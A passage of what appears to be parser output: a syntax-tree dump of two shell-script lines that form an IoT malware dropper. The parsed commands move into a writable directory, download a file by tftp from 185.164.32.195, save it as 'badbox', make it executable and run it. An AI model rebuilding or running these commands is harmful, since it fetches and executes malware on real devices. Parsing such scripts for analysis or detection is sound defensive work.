    WordNode(lineno=15, pos=(1524, 1525), word='*'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1525, 1526)),
  CommandNode(lineno=15, pos=(1526, 1534), parts=[
    WordNode(lineno=15, pos=(1526, 1534), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1535, 1660), parts=[
  CommandNode(lineno=16, pos=(1535, 1542), parts=[
    WordNode(lineno=16, pos=(1535, 1537), word='cd'),
    WordNode(lineno=16, pos=(1538, 1542), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1543, 1545)),
  CommandNode(lineno=16, pos=(1546, 1557), parts=[
    WordNode(lineno=16, pos=(1546, 1548), word='cd'),
    WordNode(lineno=16, pos=(1549, 1557), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1558, 1560)),
  CommandNode(lineno=16, pos=(1561, 1568), parts=[
    WordNode(lineno=16, pos=(1561, 1563), word='cd'),
    WordNode(lineno=16, pos=(1564, 1568), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1569, 1571)),
  CommandNode(lineno=16, pos=(1572, 1580), parts=[
    WordNode(lineno=16, pos=(1572, 1574), word='cd'),
    WordNode(lineno=16, pos=(1575, 1580), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1581, 1583)),
  CommandNode(lineno=16, pos=(1584, 1588), parts=[
    WordNode(lineno=16, pos=(1584, 1586), word='cd'),
    WordNode(lineno=16, pos=(1587, 1588), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1588, 1589)),
  CommandNode(lineno=16, pos=(1590, 1622), parts=[
    WordNode(lineno=16, pos=(1590, 1594), word='tftp'),
    WordNode(lineno=16, pos=(1595, 1609), word='185.164.32.195'),
    WordNode(lineno=16, pos=(1610, 1612), word='-c'),
    WordNode(lineno=16, pos=(1613, 1616), word='get'),
    WordNode(lineno=16, pos=(1617, 1622), word='sdfvc'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1622, 1623)),
  CommandNode(lineno=16, pos=(1623, 1640), parts=[
    WordNode(lineno=16, pos=(1623, 1626), word='cat'),
    WordNode(lineno=16, pos=(1627, 1632), word='sdfvc'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1634, 1640), word='badbox'), pos=(1633, 1640), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1640, 1641)),
  CommandNode(lineno=16, pos=(1641, 1651), parts=[
    WordNode(lineno=16, pos=(1641, 1646), word='chmod'),
    WordNode(lineno=16, pos=(1647, 1649), word='+x'),
    WordNode(lineno=16, pos=(1650, 1651), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1651, 1652)),
  CommandNode(lineno=16, pos=(1652, 1660), parts=[
    WordNode(lineno=16, pos=(1652, 1660), word='./badbox'),
  ]),
])
